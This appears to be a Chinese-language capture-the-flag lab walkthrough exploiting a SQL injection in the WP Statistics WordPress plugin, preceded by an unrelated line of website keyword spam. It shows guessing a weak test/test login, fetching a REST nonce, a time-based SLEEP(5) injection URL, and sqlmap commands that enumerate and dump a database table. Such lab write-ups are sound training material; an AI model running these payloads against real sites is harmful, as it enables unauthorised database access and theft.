云南省住房和城乡建设局网站,如何选取网站关键词,学校网站建设关键技术,医院网站建设模板下载靶标介绍#xff1a;
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数#xff0c;这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下#xff0c;具有管理选项功能 (admin) 的用户可以使用受影响的功能#xff0c;但是该插件有一个设置允许低权限用户…靶标介绍
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下具有管理选项功能 (admin) 的用户可以使用受影响的功能但是该插件有一个设置允许低权限用户也可以访问它。 开启靶场 开始实验
1、使用后台扫描工具扫描靶场链接 2、打开第一个/readme.html找到后台登录页面 3、点击login.page使用admin登录显示错误用户名未在本站点注册。最后发现下面有个“返回到test”应该是有“test”用户名经过尝试得到用户名和密码都为“test” 4、使用test登录登录成功。 5、参考wpscan网站的WordPress 插件漏洞验证
https://wpscan.com/vulnerability/a0e40cfd-b217-481c-8fc4-027a0a023312/ Log in as a user allowed to View WP Statistic and get a nonce via https://example.com/wp-admin/admin-ajax.php?actionrest-nonce, and use it in the URL below, which will be delayed by 5s:http://example.com/wp-json/wp-statistics/v2/metabox?_wpnonceNONCEnamewordssearch_engineaaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR
翻译
以允许查看WP统计信息的用户身份登录并通过获取随机数https://example.com/wp-admin/admin-ajax.php?actionrest-nonce并在下面的URL中使用它该URL将延迟5s
6、必须先登录后才能获取随机数
http://eci-2ze8z8a5rz3fc378zp6e.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?actionrest-nonce 7、使用随机数测试延迟替换wpnonceNONCE为上面获取的随机数wpnonce00bb70a358
http://eci-2ze8z8a5rz3fc378zp6e.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce00bb70a358namewordssearch_engineaaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR
发现延迟5秒后显示如下图存在sql注入。 8、使用Burp抓包抓包时候要删除掉“%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR ”只使用下面地址
http://eci-2ze8z8a5rz3fc378zp6e.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce00bb70a358namewordssearch_engineaaa 9、把get内容保存为55.txt
10、使用sqlmap注入测试查找当前数据库。
sqlmap.py -r 55.txt --batch --current-db 11、查找表
sqlmap.py -r 55.txt --batch -D wordpress --tables 12、查找字段
sqlmap.py -r 55.txt --batch -D wordpress -T flag --columns 13、获取字段值得到flag
sqlmap.py -r 55.txt -D wordpress -T flag -C flag --dump
